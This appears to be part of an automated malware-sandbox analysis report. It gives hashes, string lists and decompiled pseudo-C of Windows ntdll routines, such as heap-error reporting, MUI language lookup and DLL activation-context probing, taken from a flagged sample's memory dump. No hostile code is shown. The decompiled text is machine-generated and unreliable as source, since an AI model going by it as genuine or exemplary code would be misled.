                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                    • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: b4272d3d17b2c5da9343ad5abb696ade9cf068d9a023d03307a117cae4070867
                    • Instruction ID: ab3ca265846676aa369bc085c39992a50e0c52756b469b4d607a6193502350b3
                    • Opcode Fuzzy Hash: b4272d3d17b2c5da9343ad5abb696ade9cf068d9a023d03307a117cae4070867
                    • Instruction Fuzzy Hash: 52E08C762012187BD620DB59CC89FD73BACDB49BA4F0981657A986B283C534EA0086E5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                    Memory Dump Source
                    • Source File: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                    • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ee3b82205e7a698292b1c1868bc11defed73c9f445cf3b961278753d1408783f
                    • Instruction ID: b24e4ec2db5eeb6de4659ef7ee6c29642be14ac35b2c1c5cfb11921f8c6698f5
                    • Opcode Fuzzy Hash: ee3b82205e7a698292b1c1868bc11defed73c9f445cf3b961278753d1408783f
                    • Instruction Fuzzy Hash: 7EB09B71D014D5C6D651D7A446087177910BBD4745F57C463D1060652B8778D091F5B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Strings
                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0151B476
                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0151B323
                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0151B3D6
                    • an invalid address, %p, xrefs: 0151B4CF
                    • *** An Access Violation occurred in %ws:%s, xrefs: 0151B48F
                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0151B39B
                    • write to, xrefs: 0151B4A6
                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0151B305
                    • *** enter .exr %p for the exception record, xrefs: 0151B4F1
                    • *** enter .cxr %p for the context, xrefs: 0151B50D
                    • This failed because of error %Ix., xrefs: 0151B446
                    • The instruction at %p tried to %s , xrefs: 0151B4B6
                    • *** then kb to get the faulting stack, xrefs: 0151B51C
                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0151B314
                    • The resource is owned shared by %d threads, xrefs: 0151B37E
                    • a NULL pointer, xrefs: 0151B4E0
                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0151B47D
                    • The critical section is owned by thread %p., xrefs: 0151B3B9
                    • *** Resource timeout (%p) in %ws:%s, xrefs: 0151B352
                    • read from, xrefs: 0151B4AD, 0151B4B2
                    • The resource is owned exclusively by thread %p, xrefs: 0151B374
                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0151B53F
                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0151B484
                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0151B38F
                    • The instruction at %p referenced memory at %p., xrefs: 0151B432
                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0151B2F3
                    • <unknown>, xrefs: 0151B27E, 0151B2D1, 0151B350, 0151B399, 0151B417, 0151B48E
                    • Go determine why that thread has not released the critical section., xrefs: 0151B3C5
                    • *** Inpage error in %ws:%s, xrefs: 0151B418
                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0151B2DC
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                    • API String ID: 0-108210295
                    • Opcode ID: 002c781ca5e1fb3ef8fcc0d71538c707b2ad71aa47588cd52cd64a73543cf583
                    • Instruction ID: 6ad703d2b69ae4870347fa7633ed0fb25da4a4368ba4f7d5e4290d0b9f870386
                    • Opcode Fuzzy Hash: 002c781ca5e1fb3ef8fcc0d71538c707b2ad71aa47588cd52cd64a73543cf583
                    • Instruction Fuzzy Hash: 34810475A40200FBEB226A4A9C45D6F3F76FF66B51F40404EFA042F236E2B59551CAB2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 44%
                    			E01521C06() {
                    				signed int _t27;
                    				char* _t104;
                    				char* _t105;
                    				intOrPtr _t113;
                    				intOrPtr _t115;
                    				intOrPtr _t117;
                    				intOrPtr _t119;
                    				intOrPtr _t120;
                    
                    				_t105 = 0x14448a4;
                    				_t104 = "HEAP: ";
                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    					_push(_t104);
                    					E0146B150();
                    				} else {
                    					E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    				}
                    				_push( *0x155589c);
                    				E0146B150("Heap error detected at %p (heap handle %p)\n",  *0x15558a0);
                    				_t27 =  *0x1555898; // 0x0
                    				if(_t27 <= 0xf) {
                    					switch( *((intOrPtr*)(_t27 * 4 +  &M01521E96))) {
                    						case 0:
                    							_t105 = "heap_failure_internal";
                    							goto L21;
                    						case 1:
                    							goto L21;
                    						case 2:
                    							goto L21;
                    						case 3:
                    							goto L21;
                    						case 4:
                    							goto L21;
                    						case 5:
                    							goto L21;
                    						case 6:
                    							goto L21;
                    						case 7:
                    							goto L21;
                    						case 8:
                    							goto L21;
                    						case 9:
                    							goto L21;
                    						case 0xa:
                    							goto L21;
                    						case 0xb:
                    							goto L21;
                    						case 0xc:
                    							goto L21;
                    						case 0xd:
                    							goto L21;
                    						case 0xe:
                    							goto L21;
                    						case 0xf:
                    							goto L21;
                    					}
                    				}
                    				L21:
                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    					_push(_t104);
                    					E0146B150();
                    				} else {
                    					E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    				}
                    				_push(_t105);
                    				E0146B150("Error code: %d - %s\n",  *0x1555898);
                    				_t113 =  *0x15558a4; // 0x0
                    				if(_t113 != 0) {
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push(_t104);
                    						E0146B150();
                    					} else {
                    						E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					E0146B150("Parameter1: %p\n",  *0x15558a4);
                    				}
                    				_t115 =  *0x15558a8; // 0x0
                    				if(_t115 != 0) {
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push(_t104);
                    						E0146B150();
                    					} else {
                    						E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					E0146B150("Parameter2: %p\n",  *0x15558a8);
                    				}
                    				_t117 =  *0x15558ac; // 0x0
                    				if(_t117 != 0) {
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push(_t104);
                    						E0146B150();
                    					} else {
                    						E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					E0146B150("Parameter3: %p\n",  *0x15558ac);
                    				}
                    				_t119 =  *0x15558b0; // 0x0
                    				if(_t119 != 0) {
                    					L41:
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push(_t104);
                    						E0146B150();
                    					} else {
                    						E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					_push( *0x15558b4);
                    					E0146B150("Last known valid blocks: before - %p, after - %p\n",  *0x15558b0);
                    				} else {
                    					_t120 =  *0x15558b4; // 0x0
                    					if(_t120 != 0) {
                    						goto L41;
                    					}
                    				}
                    				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    					_push(_t104);
                    					E0146B150();
                    				} else {
                    					E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    				}
                    				return E0146B150("Stack trace available at %p\n", 0x15558c0);
                    			}












                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                    • API String ID: 0-2897834094
                    • Opcode ID: 1bec0abeb26a68a107af6bb6100e9e83c8cf9e390108369d393b28d9e9917096
                    • Instruction ID: 8ef2fa56f887678a0a19a78219aadd94f64cb780c374340149289dba064defe1
                    • Opcode Fuzzy Hash: 1bec0abeb26a68a107af6bb6100e9e83c8cf9e390108369d393b28d9e9917096
                    • Instruction Fuzzy Hash: 96613737610955EFD311AB86D4C5D26B7E8FB129B4B1A806FF90DBF3A1D6309C408B1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E01473D34(signed int* __ecx) {
                    				signed int* _v8;
                    				char _v12;
                    				signed int* _v16;
                    				signed int* _v20;
                    				char _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				char _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				signed int* _v48;
                    				signed int* _v52;
                    				signed int _v56;
                    				signed int _v60;
                    				char _v68;
                    				signed int _t140;
                    				signed int _t161;
                    				signed int* _t236;
                    				signed int* _t242;
                    				signed int* _t243;
                    				signed int* _t244;
                    				signed int* _t245;
                    				signed int _t255;
                    				void* _t257;
                    				signed int _t260;
                    				void* _t262;
                    				signed int _t264;
                    				void* _t267;
                    				signed int _t275;
                    				signed int* _t276;
                    				short* _t277;
                    				signed int* _t278;
                    				signed int* _t279;
                    				signed int* _t280;
                    				short* _t281;
                    				signed int* _t282;
                    				short* _t283;
                    				signed int* _t284;
                    				void* _t285;
                    
                    				_v60 = _v60 | 0xffffffff;
                    				_t280 = 0;
                    				_t242 = __ecx;
                    				_v52 = __ecx;
                    				_v8 = 0;
                    				_v20 = 0;
                    				_v40 = 0;
                    				_v28 = 0;
                    				_v32 = 0;
                    				_v44 = 0;
                    				_v56 = 0;
                    				_t275 = 0;
                    				_v16 = 0;
                    				if(__ecx == 0) {
                    					_t280 = 0xc000000d;
                    					_t140 = 0;
                    					L50:
                    					 *_t242 =  *_t242 | 0x00000800;
                    					_t242[0x13] = _t140;
                    					_t242[0x16] = _v40;
                    					_t242[0x18] = _v28;
                    					_t242[0x14] = _v32;
                    					_t242[0x17] = _t275;
                    					_t242[0x15] = _v44;
                    					_t242[0x11] = _v56;
                    					_t242[0x12] = _v60;
                    					return _t280;
                    				}
                    				if(E01471B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                    					_v56 = 1;
                    					if(_v8 != 0) {
                    						L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                    					}
                    					_v8 = _t280;
                    				}
                    				if(E01471B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                    					_v60 =  *_v8;
                    					L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                    					_v8 = _t280;
                    				}
                    				if(E01471B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                    					L16:
                    					if(E01471B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                    						L28:
                    						if(E01471B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                    							L46:
                    							_t275 = _v16;
                    							L47:
                    							_t161 = 0;
                    							L48:
                    							if(_v8 != 0) {
                    								L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                    							}
                    							_t140 = _v20;
                    							if(_t140 != 0) {
                    								if(_t275 != 0) {
                    									L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                    									_t275 = 0;
                    									_v28 = 0;
                    									_t140 = _v20;
                    								}
                    							}
                    							goto L50;
                    						}
                    						_t167 = _v12;
                    						_t255 = _v12 + 4;
                    						_v44 = _t255;
                    						if(_t255 == 0) {
                    							_t276 = _t280;
                    							_v32 = _t280;
                    						} else {
                    							_t276 = L01484620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                    							_t167 = _v12;
                    							_v32 = _t276;
                    						}
                    						if(_t276 == 0) {
                    							_v44 = _t280;
                    							_t280 = 0xc0000017;
                    							goto L46;
                    						} else {
                    							E014AF3E0(_t276, _v8, _t167);
                    							_v48 = _t276;
                    							_t277 = E014B1370(_t276, 0x1444e90);
                    							_pop(_t257);
                    							if(_t277 == 0) {
                    								L38:
                    								_t170 = _v48;
                    								if( *_v48 != 0) {
                    									E014ABB40(0,  &_v68, _t170);
                    									if(L014743C0( &_v68,  &_v24) != 0) {
                    										_t280 =  &(_t280[0]);
                    									}
                    								}
                    								if(_t280 == 0) {
                    									_t280 = 0;
                    									L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                    									_v44 = 0;
                    									_v32 = 0;
                    								} else {
                    									_t280 = 0;
                    								}
                    								_t174 = _v8;
                    								if(_v8 != 0) {
                    									L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                    								}
                    								_v8 = _t280;
                    								goto L46;
                    							}
                    							_t243 = _v48;
                    							do {
                    								 *_t277 = 0;
                    								_t278 = _t277 + 2;
                    								E014ABB40(_t257,  &_v68, _t243);
                    								if(L014743C0( &_v68,  &_v24) != 0) {
                    									_t280 =  &(_t280[0]);
                    								}
                    								_t243 = _t278;
                    								_t277 = E014B1370(_t278, 0x1444e90);
                    								_pop(_t257);
                    							} while (_t277 != 0);
                    							_v48 = _t243;
                    							_t242 = _v52;
                    							goto L38;
                    						}
                    					}
                    					_t191 = _v12;
                    					_t260 = _v12 + 4;
                    					_v28 = _t260;
                    					if(_t260 == 0) {
                    						_t275 = _t280;
                    						_v16 = _t280;
                    					} else {
                    						_t275 = L01484620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                    						_t191 = _v12;
                    						_v16 = _t275;
                    					}
                    					if(_t275 == 0) {
                    						_v28 = _t280;
                    						_t280 = 0xc0000017;
                    						goto L47;
                    					} else {
                    						E014AF3E0(_t275, _v8, _t191);
                    						_t285 = _t285 + 0xc;
                    						_v48 = _t275;
                    						_t279 = _t280;
                    						_t281 = E014B1370(_v16, 0x1444e90);
                    						_pop(_t262);
                    						if(_t281 != 0) {
                    							_t244 = _v48;
                    							do {
                    								 *_t281 = 0;
                    								_t282 = _t281 + 2;
                    								E014ABB40(_t262,  &_v68, _t244);
                    								if(L014743C0( &_v68,  &_v24) != 0) {
                    									_t279 =  &(_t279[0]);
                    								}
                    								_t244 = _t282;
                    								_t281 = E014B1370(_t282, 0x1444e90);
                    								_pop(_t262);
                    							} while (_t281 != 0);
                    							_v48 = _t244;
                    							_t242 = _v52;
                    						}
                    						_t201 = _v48;
                    						_t280 = 0;
                    						if( *_v48 != 0) {
                    							E014ABB40(_t262,  &_v68, _t201);
                    							if(L014743C0( &_v68,  &_v24) != 0) {
                    								_t279 =  &(_t279[0]);
                    							}
                    						}
                    						if(_t279 == 0) {
                    							L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                    							_v28 = _t280;
                    							_v16 = _t280;
                    						}
                    						_t202 = _v8;
                    						if(_v8 != 0) {
                    							L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                    						}
                    						_v8 = _t280;
                    						goto L28;
                    					}
                    				}
                    				_t214 = _v12;
                    				_t264 = _v12 + 4;
                    				_v40 = _t264;
                    				if(_t264 == 0) {
                    					_v20 = _t280;
                    				} else {
                    					_t236 = L01484620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                    					_t280 = _t236;
                    					_v20 = _t236;
                    					_t214 = _v12;
                    				}
                    				if(_t280 == 0) {
                    					_t161 = 0;
                    					_t280 = 0xc0000017;
                    					_v40 = 0;
                    					goto L48;
                    				} else {
                    					E014AF3E0(_t280, _v8, _t214);
                    					_t285 = _t285 + 0xc;
                    					_v48 = _t280;
                    					_t283 = E014B1370(_t280, 0x1444e90);
                    					_pop(_t267);
                    					if(_t283 != 0) {
                    						_t245 = _v48;
                    						do {
                    							 *_t283 = 0;
                    							_t284 = _t283 + 2;
                    							E014ABB40(_t267,  &_v68, _t245);
                    							if(L014743C0( &_v68,  &_v24) != 0) {
                    								_t275 = _t275 + 1;
                    							}
                    							_t245 = _t284;
                    							_t283 = E014B1370(_t284, 0x1444e90);
                    							_pop(_t267);
                    						} while (_t283 != 0);
                    						_v48 = _t245;
                    						_t242 = _v52;
                    					}
                    					_t224 = _v48;
                    					_t280 = 0;
                    					if( *_v48 != 0) {
                    						E014ABB40(_t267,  &_v68, _t224);
                    						if(L014743C0( &_v68,  &_v24) != 0) {
                    							_t275 = _t275 + 1;
                    						}
                    					}
                    					if(_t275 == 0) {
                    						L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                    						_v40 = _t280;
                    						_v20 = _t280;
                    					}
                    					_t225 = _v8;
                    					if(_v8 != 0) {
                    						L014877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                    					}
                    					_v8 = _t280;
                    					goto L16;
                    				}
                    			}











































                    Strings
                    • Kernel-MUI-Language-Allowed, xrefs: 01473DC0
                    • WindowsExcludedProcs, xrefs: 01473D6F
                    • Kernel-MUI-Language-SKU, xrefs: 01473F70
                    • Kernel-MUI-Number-Allowed, xrefs: 01473D8C
                    • Kernel-MUI-Language-Disallowed, xrefs: 01473E97
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                    • API String ID: 0-258546922
                    • Opcode ID: 0285780bbe233b2bf32356d1a5d6c1f2652b03be31b0d78e8f41f479ebfade01
                    • Instruction ID: 52b3431a44a9ef103bd353e6f4c52dafea104e7bb0dfe440abb2abc1e54f851c
                    • Opcode Fuzzy Hash: 0285780bbe233b2bf32356d1a5d6c1f2652b03be31b0d78e8f41f479ebfade01
                    • Instruction Fuzzy Hash: 75F14F76D00619EFDB11DF99C980AEFBBB9FF58A50F15005BE905A7260E7349E01CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 29%
                    			E014640E1(void* __edx) {
                    				void* _t19;
                    				void* _t29;
                    
                    				_t28 = _t19;
                    				_t29 = __edx;
                    				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                    					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                    						_push("HEAP: ");
                    						E0146B150();
                    					} else {
                    						E0146B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                    					}
                    					E0146B150("Invalid heap signature for heap at %p", _t28);
                    					if(_t29 != 0) {
                    						E0146B150(", passed to %s", _t29);
                    					}
                    					_push("\n");
                    					E0146B150();
                    					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                    						 *0x1556378 = 1;
                    						asm("int3");
                    						 *0x1556378 = 0;
                    					}
                    					return 0;
                    				}
                    				return 1;
                    			}






                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                    • API String ID: 0-188067316
                    • Opcode ID: fe51f4dd15b682da054ea184d6a5c1673d04d3182e5da6c3b42768d0d2f6e6c4
                    • Instruction ID: f1d6ba58afae750d91a80c4e6dc1f239fcd19b1b31c8e053d396a4a6edc91875
                    • Opcode Fuzzy Hash: fe51f4dd15b682da054ea184d6a5c1673d04d3182e5da6c3b42768d0d2f6e6c4
                    • Instruction Fuzzy Hash: A1012D7B204691EFE369976A941DF93B7A8DB12F78F2A802FF004477718AB49840C116
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 44%
                    			E01498E00(void* __ecx) {
                    				signed int _v8;
                    				char _v12;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				intOrPtr* _t32;
                    				intOrPtr _t35;
                    				intOrPtr _t43;
                    				void* _t46;
                    				intOrPtr _t47;
                    				void* _t48;
                    				signed int _t49;
                    				void* _t50;
                    				intOrPtr* _t51;
                    				signed int _t52;
                    				void* _t53;
                    				intOrPtr _t55;
                    
                    				_v8 =  *0x155d360 ^ _t52;
                    				_t49 = 0;
                    				_t48 = __ecx;
                    				_t55 =  *0x1558464; // 0x74790110
                    				if(_t55 == 0) {
                    					L9:
                    					if( !_t49 >= 0) {
                    						if(( *0x1555780 & 0x00000003) != 0) {
                    							E014E5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                    						}
                    						if(( *0x1555780 & 0x00000010) != 0) {
                    							asm("int3");
                    						}
                    					}
                    					return E014AB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                    				}
                    				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                    				_t43 =  *0x1557984; // 0x11a2ca8
                    				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                    					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                    					if(_t48 == _t43) {
                    						_t50 = 0x5c;
                    						if( *_t32 == _t50) {
                    							_t46 = 0x3f;
                    							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                    								_t32 = _t32 + 8;
                    							}
                    						}
                    					}
                    					_t51 =  *0x1558464; // 0x74790110
                    					 *0x155b1e0(_t47, _t32,  &_v12);
                    					_t49 =  *_t51();
                    					if(_t49 >= 0) {
                    						L8:
                    						_t35 = _v12;
                    						if(_t35 != 0) {
                    							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                    								E01499B10( *((intOrPtr*)(_t48 + 0x48)));
                    								_t35 = _v12;
                    							}
                    							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                    						}
                    						goto L9;
                    					}
                    					if(_t49 != 0xc000008a) {
                    						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                    							if(_t49 != 0xc00000bb) {
                    								goto L8;
                    							}
                    						}
                    					}
                    					if(( *0x1555780 & 0x00000005) != 0) {
                    						_push(_t49);
                    						E014E5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                    						_t53 = _t53 + 0x1c;
                    					}
                    					_t49 = 0;
                    					goto L8;
                    				} else {
                    					goto L9;
                    				}
                    			}





















                    Strings
                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 014D932A
                    • Querying the active activation context failed with status 0x%08lx, xrefs: 014D9357
                    • LdrpFindDllActivationContext, xrefs: 014D9331, 014D935D
                    • minkernel\ntdll\ldrsnap.c, xrefs: 014D933B, 014D9367
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID:
                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                    • API String ID: 0-3779518884
                    • Opcode ID: b0232fefbc897b05b55f735730d5647633fceca587d32992a4bfa960507a4d3c
                    • Instruction ID: 248b378ff69d163589352b8b690bd4bb338fa8b6fb96f5f98d1ba36cfd13a274
                    • Opcode Fuzzy Hash: b0232fefbc897b05b55f735730d5647633fceca587d32992a4bfa960507a4d3c
                    • Instruction Fuzzy Hash: 14411932A0031F9FEF356A5DC878A377EB4BB56268F06416BE914D72B1E7706C808381
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.437089403.0000000001440000.00000040.00000001.sdmp, Offset: 01440000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                    • API String ID: 2994545307-336120773
                    • Opcode ID: 7d145324adb83880e84eb9b89c8dd917166c3a60d25fd29b9882a270207d8227
                    • Instruction ID: 9f74bd0fb886b3f7ec39760f29d0b91ecac62a2d677bdba4f244a3351baa40f7
                    • Opcode Fuzzy Hash: 7d145324adb83880e84eb9b89c8dd917166c3a60d25fd29b9882a270207d8227
                    • Instruction Fuzzy Hash: 7031F573200120FFD310DB9AC885F6A77E9FF16A64F15846AF505DF2A1D7B0A884C759
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E01478794(void* __ecx) {
                    				signed int _v0;
                    				char _v8;
                    				signed int _v12;
                    				void* _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v40;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr* _t77;
                    				signed int _t80;
                    				signed char _t81;
                    				signed int _t87;
                    				signed int _t91;
                    				void* _t92;
                    				void* _t94;
                    				signed int _t95;
                    				signed int _t103;
                    				signed int _t105;
                    				signed int _t110;
                    				signed int _t118;
                    				intOrPtr* _t121;
                    				intOrPtr _t122;
                    				signed int _t125;
                    				signed int _t129;
